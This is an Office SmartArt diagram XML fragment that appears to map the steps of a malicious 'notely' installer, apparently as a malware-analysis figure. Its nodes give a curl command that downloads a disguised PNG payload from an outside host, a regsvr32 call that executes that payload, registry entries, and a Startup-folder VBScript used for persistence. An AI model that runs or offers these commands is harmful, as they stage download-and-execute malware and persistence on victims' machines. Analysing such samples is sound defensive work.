        <a:p>
          <a:pPr algn="l"/>
          <a:r>
            <a:rPr lang="en-US" sz="1100"/>
            <a:t>Unpack and save a ZIP file (Emergreport.zip) to C:/Users/howl/AppData/Roaming</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1100">
            <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0C90E3CA-5C99-4958-828C-4E5B841DA1A6}" type="parTrans" cxnId="{4BEF09EA-BE59-4FBF-8E1F-6498245101D8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{517E5413-A508-4C54-8EF1-B8E794171C59}" type="sibTrans" cxnId="{4BEF09EA-BE59-4FBF-8E1F-6498245101D8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6675F9D1-DCCC-470A-A306-D50BD14A969B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notely.exe</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EEA8068E-626F-4FD0-8857-F565967EC278}" type="parTrans" cxnId="{19DF72AB-18C4-40F1-B102-2108C62F4922}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4822C0D4-1F8A-4DED-88CC-EEAD689BC6FC}" type="sibTrans" cxnId="{19DF72AB-18C4-40F1-B102-2108C62F4922}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C656A8D3-7D7E-4266-B13C-8EDCC80DD6A8}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2400"/>
            <a:t>notely-setup-x64.msi</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2400">
            <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B3522D0E-88B5-41B9-83A5-4F45E80ACC3E}" type="sibTrans" cxnId="{89B5A280-FB43-4A6A-8B42-6F923073D48E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5C9A5E8B-F030-46B6-9257-AE2D695BABE8}" type="parTrans" cxnId="{89B5A280-FB43-4A6A-8B42-6F923073D48E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7E89463D-27F5-473E-AB8E-3BC66859B534}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="l"/>
          <a:r>
            <a:rPr lang="en-US" sz="1100"/>
            <a:t>Then it excute this command:C:\Windows\system32\curl -s -o C:\Users\howl\AppData\Roaming\oneWitch.png consumerfinancereport.local/blog/index/witchABy.jpg</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1100">
            <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BD587FA2-A505-46BE-B12A-CD476C14439C}" type="sibTrans" cxnId="{24BACE77-55A1-431E-BA21-ECB79A05CCFA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FDCABC8F-FD8D-45F9-BF80-214D7C8D1538}" type="parTrans" cxnId="{24BACE77-55A1-431E-BA21-ECB79A05CCFA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D7F22016-1D7D-4128-AD60-3D91AE134BAA}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="l"/>
          <a:r>
            <a:rPr lang="en-US" sz="1100">
              <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:rPr>
            <a:t>then:HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\SharedDlls\C:\Users\howl\AppData\Roaming\Emergreport.zip</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B9AAC470-9682-491D-9507-0A71C14CF323}" type="parTrans" cxnId="{21E8D7C0-5AF6-4540-9A52-72E9CADF93CC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{732D1EFD-7257-412A-8CA3-01391C61C59E}" type="sibTrans" cxnId="{21E8D7C0-5AF6-4540-9A52-72E9CADF93CC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{270C1156-B26E-44C4-87AD-BAE71615A9E6}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="l"/>
          <a:r>
            <a:rPr lang="en-US" sz="1100">
              <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:rPr>
            <a:t>HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\PnpLockdownFiles\%SystemDrive%/Users/howl/AppData/Roaming/Emergreport.zip</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5031D2CA-5155-4446-A5C8-07706808AE77}" type="parTrans" cxnId="{412DEA74-4A97-4381-A577-2C60A783C568}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{23C3A4C7-6D51-470B-99A2-3532F6D02376}" type="sibTrans" cxnId="{412DEA74-4A97-4381-A577-2C60A783C568}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1C826DDD-489F-47E5-A114-F8EDCEF4BDCE}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="l"/>
          <a:r>
            <a:rPr lang="en-US" sz="1100"/>
            <a:t>\Users\howl\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\unzip.vbs</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1100">
            <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F1E41CA3-9A7D-48C1-8EF8-4FD39B0E6D32}" type="parTrans" cxnId="{224DC88A-CFA7-43E4-8BCB-98C1F2A30CBC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6609CEA3-0896-4A12-8B0D-2B824C252ED2}" type="sibTrans" cxnId="{224DC88A-CFA7-43E4-8BCB-98C1F2A30CBC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0A03CA4E-16EF-44E5-950B-85A7B4B68AD2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Located at a folder named NoCapSoftware and has a shortcut in Desktop</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E7A3C98F-EFA1-4150-8C61-071028FDB6A5}" type="sibTrans" cxnId="{0ABCA4E2-9688-4A88-B2F7-7D1F141ACF29}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0FC65411-7BFC-496F-BABD-A49FB290C44B}" type="parTrans" cxnId="{0ABCA4E2-9688-4A88-B2F7-7D1F141ACF29}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1ECB58D0-B78C-47B1-828B-CE1E36B65FE6}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="l"/>
          <a:r>
            <a:rPr lang="en-US" sz="1100"/>
            <a:t>C:\Windows\system32\regsvr32 C:\Users\howl\AppData\Roaming\OneWitch.png</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1100">
            <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DC34BDC8-40C4-410F-A5F3-9235D1636FA1}" type="parTrans" cxnId="{C80EC26D-BF38-4ED6-8E58-1CFB77C50B59}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CEB060F3-F705-4CAE-B3E2-62983BA0C59B}" type="sibTrans" cxnId="{C80EC26D-BF38-4ED6-8E58-1CFB77C50B59}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4720D96E-6E0C-4A07-BAE1-10A99FFDEAA0}" type="pres">
      <dgm:prSet presAssocID="{3BCDC70A-D13A-4143-AE54-324F7A0EE53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7725A94-E1DA-4F39-93A7-FDD965858616}" type="pres">
      <dgm:prSet presAssocID="{C656A8D3-7D7E-4266-B13C-8EDCC80DD6A8}" presName="root" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{98582C2D-0429-4FB5-89AC-BE9582CF866C}" type="pres">
      <dgm:prSet presAssocID="{C656A8D3-7D7E-4266-B13C-8EDCC80DD6A8}" presName="rootComposite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B369C25D-8E0D-4F88-ABDE-6DF39D006121}" type="pres">
      <dgm:prSet presAssocID="{C656A8D3-7D7E-4266-B13C-8EDCC80DD6A8}" presName="rootText" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="2" custScaleX="269561" custScaleY="172063"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F814D6A9-FE86-4E60-B88F-F892FC0CDDFB}" type="pres">
      <dgm:prSet presAssocID="{C656A8D3-7D7E-4266-B13C-8EDCC80DD6A8}" presName="rootConnector" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="2"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1D4118F7-38F5-4EE6-9CEE-354525C6F117}" type="pres">
      <dgm:prSet presAssocID="{C656A8D3-7D7E-4266-B13C-8EDCC80DD6A8}" presName="childShape" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7B08DFFE-4EC1-4C43-AE9D-42B94E05D522}" type="pres">
      <dgm:prSet presAssocID="{F1E41CA3-9A7D-48C1-8EF8-4FD39B0E6D32}" presName="Name13" presStyleLbl="parChTrans1D2" presStyleIdx="0" presStyleCnt="7"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{60EED537-89B6-4747-B33C-84D6B506FB7C}" type="pres">
      <dgm:prSet presAssocID="{1C826DDD-489F-47E5-A114-F8EDCEF4BDCE}" presName="childText" presStyleLbl="bgAcc1" presStyleIdx="0" presStyleCnt="7" custScaleX="287277">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{11906579-E254-4F53-A5D7-645CFEDAB012}" type="pres">
      <dgm:prSet presAssocID="{0C90E3CA-5C99-4958-828C-4E5B841DA1A6}" presName="Name13" presStyleLbl="parChTrans1D2" presStyleIdx="1" presStyleCnt="7"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1C736118-38E2-44B6-B438-9AB467A9FC33}" type="pres">
      <dgm:prSet presAssocID="{10258744-440A-4C9B-8BC5-3F3EF92E8BF2}" presName="childText" presStyleLbl="bgAcc1" presStyleIdx="1" presStyleCnt="7" custScaleX="401032">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6408ABE0-3FC7-40C6-9F81-57DD8E005CA0}" type="pres">
      <dgm:prSet presAssocID="{B9AAC470-9682-491D-9507-0A71C14CF323}" presName="Name13" presStyleLbl="parChTrans1D2" presStyleIdx="2" presStyleCnt="7"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3A57D2EB-E02E-4318-A167-E586C0E63827}" type="pres">
      <dgm:prSet presAssocID="{D7F22016-1D7D-4128-AD60-3D91AE134BAA}" presName="childText" presStyleLbl="bgAcc1" presStyleIdx="2" presStyleCnt="7" custScaleX="719747">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F27BF41D-47D5-42E7-9933-95A66D73FAD0}" type="pres">
      <dgm:prSet presAssocID="{5031D2CA-5155-4446-A5C8-07706808AE77}" presName="Name13" presStyleLbl="parChTrans1D2" presStyleIdx="3" presStyleCnt="7"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{468B0EA1-55D9-4F95-8CB4-1BB5CFDF43FF}" type="pres">
      <dgm:prSet presAssocID="{270C1156-B26E-44C4-87AD-BAE71615A9E6}" presName="childText" presStyleLbl="bgAcc1" presStyleIdx="3" presStyleCnt="7" custScaleX="676169">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3F3AEC5B-59CB-4856-A9B4-4AC80551FF5B}" type="pres">
      <dgm:prSet presAssocID="{FDCABC8F-FD8D-45F9-BF80-214D7C8D1538}" presName="Name13" presStyleLbl="parChTrans1D2" presStyleIdx="4" presStyleCnt="7"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{81CDCCEE-6D47-4AF9-97AF-D303A141EC73}" type="pres">
      <dgm:prSet presAssocID="{7E89463D-27F5-473E-AB8E-3BC66859B534}" presName="childText" presStyleLbl="bgAcc1" presStyleIdx="4" presStyleCnt="7" custScaleX="628993">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{CE569592-13BA-4B4F-9369-C5FF01CA4D0D}" type="pres">
      <dgm:prSet presAssocID="{DC34BDC8-40C4-410F-A5F3-9235D1636FA1}" presName="Name13" presStyleLbl="parChTrans1D2" presStyleIdx="5" presStyleCnt="7"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6346F79D-E94C-4835-B5F5-5E6067D9DF13}" type="pres">
      <dgm:prSet presAssocID="{1ECB58D0-B78C-47B1-828B-CE1E36B65FE6}" presName="childText" presStyleLbl="bgAcc1" presStyleIdx="5" presStyleCnt="7" custScaleX="573417">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{52A86321-27B9-40CC-8E67-EBE46F64F4AA}" type="pres">
      <dgm:prSet presAssocID="{6675F9D1-DCCC-470A-A306-D50BD14A969B}" presName="root" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{AE7A2C11-5012-4666-8E26-7D1F496AAD46}" type="pres">
      <dgm:prSet presAssocID="{6675F9D1-DCCC-470A-A306-D50BD14A969B}" presName="rootComposite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C70499B9-9E13-4666-9509-800D713B9607}" type="pres">
      <dgm:prSet presAssocID="{6675F9D1-DCCC-470A-A306-D50BD14A969B}" presName="rootText" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="2" custScaleX="139942" custScaleY="172614"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F1123AB9-6632-421F-9FA1-D52FCB934995}" type="pres">
      <dgm:prSet presAssocID="{6675F9D1-DCCC-470A-A306-D50BD14A969B}" presName="rootConnector" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="2"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3B261433-48B5-45E1-8302-2E3844F6256B}" type="pres">
      <dgm:prSet presAssocID="{6675F9D1-DCCC-470A-A306-D50BD14A969B}" presName="childShape" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A2CC9F21-EE73-4FD0-8A58-7D3DBBA5D03A}" type="pres">
      <dgm:prSet presAssocID="{0FC65411-7BFC-496F-BABD-A49FB290C44B}" presName="Name13" presStyleLbl="parChTrans1D2" presStyleIdx="6" presStyleCnt="7"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{BB74F4A0-6667-4351-9A85-AA0C7736449F}" type="pres">
      <dgm:prSet presAssocID="{0A03CA4E-16EF-44E5-950B-85A7B4B68AD2}" presName="childText" presStyleLbl="bgAcc1" presStyleIdx="6" presStyleCnt="7" custScaleX="252391">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{59E03609-33DE-4AEB-9E64-D1D4E6BF0359}" type="presOf" srcId="{DC34BDC8-40C4-410F-A5F3-9235D1636FA1}" destId="{CE569592-13BA-4B4F-9369-C5FF01CA4D0D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy3"/>
    <dgm:cxn modelId="{1DE6E40E-2CE9-4D1E-95DA-5D060D3690DE}" type="presOf" srcId="{C656A8D3-7D7E-4266-B13C-8EDCC80DD6A8}" destId="{B369C25D-8E0D-4F88-ABDE-6DF39D006121}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy3"/>
    <dgm:cxn modelId="{15EFE015-8932-4FC9-874C-C26AAB0A0B8D}" type="presOf" srcId="{B9AAC470-9682-491D-9507-0A71C14CF323}" destId="{6408ABE0-3FC7-40C6-9F81-57DD8E005CA0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy3"/>
    <dgm:cxn modelId="{0A77501B-8253-4AD1-8610-71AF2B5C9A24}" type="presOf" srcId="{1C826DDD-489F-47E5-A114-F8EDCEF4BDCE}" destId="{60EED537-89B6-4747-B33C-84D6B506FB7C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy3"/>
    <dgm:cxn modelId="{7DB9BA29-4570-45A8-96D5-43BE8E2CD1F3}" type="presOf" srcId="{C656A8D3-7D7E-4266-B13C-8EDCC80DD6A8}" destId="{F814D6A9-FE86-4E60-B88F-F892FC0CDDFB}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy3"/>
    <dgm:cxn modelId="{DAEB522A-08D2-494A-8B56-B41992072C48}" type="presOf" srcId="{5031D2CA-5155-4446-A5C8-07706808AE77}" destId="{F27BF41D-47D5-42E7-9933-95A66D73FAD0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy3"/>
    <dgm:cxn modelId="{EEB09338-FF34-4D96-B6E5-5342C4E98BB8}" type="presOf" srcId="{D7F22016-1D7D-4128-AD60-3D91AE134BAA}" destId="{3A57D2EB-E02E-4318-A167-E586C0E63827}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy3"/>
    <dgm:cxn modelId="{7252AC3D-7BA7-4D5C-9B48-603619823067}" type="presOf" srcId="{6675F9D1-DCCC-470A-A306-D50BD14A969B}" destId="{F1123AB9-6632-421F-9FA1-D52FCB934995}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy3"/>
    <dgm:cxn modelId="{6734575C-FF2F-4EDA-8C70-D616925C74F3}" type="presOf" srcId="{0FC65411-7BFC-496F-BABD-A49FB290C44B}" destId="{A2CC9F21-EE73-4FD0-8A58-7D3DBBA5D03A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy3"/>
    <dgm:cxn modelId="{C80EC26D-BF38-4ED6-8E58-1CFB77C50B59}" srcId="{C656A8D3-7D7E-4266-B13C-8EDCC80DD6A8}" destId="{1ECB58D0-B78C-47B1-828B-CE1E36B65FE6}" srcOrd="5" destOrd="0" parTransId="{DC34BDC8-40C4-410F-A5F3-9235D1636FA1}" sibTransId="{CEB060F3-F705-4CAE-B3E2-62983BA0C59B}"/>
    <dgm:cxn modelId="{412DEA74-4A97-4381-A577-2C60A783C568}" srcId="{C656A8D3-7D7E-4266-B13C-8EDCC80DD6A8}" destId="{270C1156-B26E-44C4-87AD-BAE71615A9E6}" srcOrd="3" destOrd="0" parTransId="{5031D2CA-5155-4446-A5C8-07706808AE77}" sibTransId="{23C3A4C7-6D51-470B-99A2-3532F6D02376}"/>
    <dgm:cxn modelId="{24BACE77-55A1-431E-BA21-ECB79A05CCFA}" srcId="{C656A8D3-7D7E-4266-B13C-8EDCC80DD6A8}" destId="{7E89463D-27F5-473E-AB8E-3BC66859B534}" srcOrd="4" destOrd="0" parTransId="{FDCABC8F-FD8D-45F9-BF80-214D7C8D1538}" sibTransId="{BD587FA2-A505-46BE-B12A-CD476C14439C}"/>
    <dgm:cxn modelId="{C53DCE78-9157-4323-9BD3-F0BCCA80C943}" type="presOf" srcId="{F1E41CA3-9A7D-48C1-8EF8-4FD39B0E6D32}" destId="{7B08DFFE-4EC1-4C43-AE9D-42B94E05D522}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy3"/>
    <dgm:cxn modelId="{89B5A280-FB43-4A6A-8B42-6F923073D48E}" srcId="{3BCDC70A-D13A-4143-AE54-324F7A0EE539}" destId="{C656A8D3-7D7E-4266-B13C-8EDCC80DD6A8}" srcOrd="0" destOrd="0" parTransId="{5C9A5E8B-F030-46B6-9257-AE2D695BABE8}" sibTransId="{B3522D0E-88B5-41B9-83A5-4F45E80ACC3E}"/>
    <dgm:cxn modelId="{AB6B038A-C161-4AE7-A181-C42F6CCEC477}" type="presOf" srcId="{0C90E3CA-5C99-4958-828C-4E5B841DA1A6}" destId="{11906579-E254-4F53-A5D7-645CFEDAB012}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy3"/>
    <dgm:cxn modelId="{224DC88A-CFA7-43E4-8BCB-98C1F2A30CBC}" srcId="{C656A8D3-7D7E-4266-B13C-8EDCC80DD6A8}" destId="{1C826DDD-489F-47E5-A114-F8EDCEF4BDCE}" srcOrd="0" destOrd="0" parTransId="{F1E41CA3-9A7D-48C1-8EF8-4FD39B0E6D32}" sibTransId="{6609CEA3-0896-4A12-8B0D-2B824C252ED2}"/>
    <dgm:cxn modelId="{9F34CB97-84CD-4B87-A3DD-B0EB33316F9F}" type="presOf" srcId="{FDCABC8F-FD8D-45F9-BF80-214D7C8D1538}" destId="{3F3AEC5B-59CB-4856-A9B4-4AC80551FF5B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy3"/>
    <dgm:cxn modelId="{19DF72AB-18C4-40F1-B102-2108C62F4922}" srcId="{3BCDC70A-D13A-4143-AE54-324F7A0EE539}" destId="{6675F9D1-DCCC-470A-A306-D50BD14A969B}" srcOrd="1" destOrd="0" parTransId="{EEA8068E-626F-4FD0-8857-F565967EC278}" sibTransId="{4822C0D4-1F8A-4DED-88CC-EEAD689BC6FC}"/>
    <dgm:cxn modelId="{427FD6AB-14BF-4509-B755-70E4179072D7}" type="presOf" srcId="{270C1156-B26E-44C4-87AD-BAE71615A9E6}" destId="{468B0EA1-55D9-4F95-8CB4-1BB5CFDF43FF}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy3"/>
    <dgm:cxn modelId="{0246AAAD-3512-494E-80A9-D6C022C3E98B}" type="presOf" srcId="{7E89463D-27F5-473E-AB8E-3BC66859B534}" destId="{81CDCCEE-6D47-4AF9-97AF-D303A141EC73}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy3"/>
    <dgm:cxn modelId="{553FF6B9-0410-4271-837C-DC2C6C2433B8}" type="presOf" srcId="{10258744-440A-4C9B-8BC5-3F3EF92E8BF2}" destId="{1C736118-38E2-44B6-B438-9AB467A9FC33}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy3"/>
    <dgm:cxn modelId="{8047C2BF-74FC-45C9-8BED-6CC3D6294FBF}" type="presOf" srcId="{3BCDC70A-D13A-4143-AE54-324F7A0EE539}" destId="{4720D96E-6E0C-4A07-BAE1-10A99FFDEAA0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy3"/>
    <dgm:cxn modelId="{21E8D7C0-5AF6-4540-9A52-72E9CADF93CC}" srcId="{C656A8D3-7D7E-4266-B13C-8EDCC80DD6A8}" destId="{D7F22016-1D7D-4128-AD60-3D91AE134BAA}" srcOrd="2" destOrd="0" parTransId="{B9AAC470-9682-491D-9507-0A71C14CF323}" sibTransId="{732D1EFD-7257-412A-8CA3-01391C61C59E}"/>
    <dgm:cxn modelId="{078DBDCA-7778-433B-9154-B17AA9A73C65}" type="presOf" srcId="{0A03CA4E-16EF-44E5-950B-85A7B4B68AD2}" destId="{BB74F4A0-6667-4351-9A85-AA0C7736449F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy3"/>
    <dgm:cxn modelId="{0ABCA4E2-9688-4A88-B2F7-7D1F141ACF29}" srcId="{6675F9D1-DCCC-470A-A306-D50BD14A969B}" destId="{0A03CA4E-16EF-44E5-950B-85A7B4B68AD2}" srcOrd="0" destOrd="0" parTransId="{0FC65411-7BFC-496F-BABD-A49FB290C44B}" sibTransId="{E7A3C98F-EFA1-4150-8C61-071028FDB6A5}"/>
    <dgm:cxn modelId="{0F2DF8E7-46E2-4FF1-85C1-ACEE4CDA7EFB}" type="presOf" srcId="{1ECB58D0-B78C-47B1-828B-CE1E36B65FE6}" destId="{6346F79D-E94C-4835-B5F5-5E6067D9DF13}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy3"/>
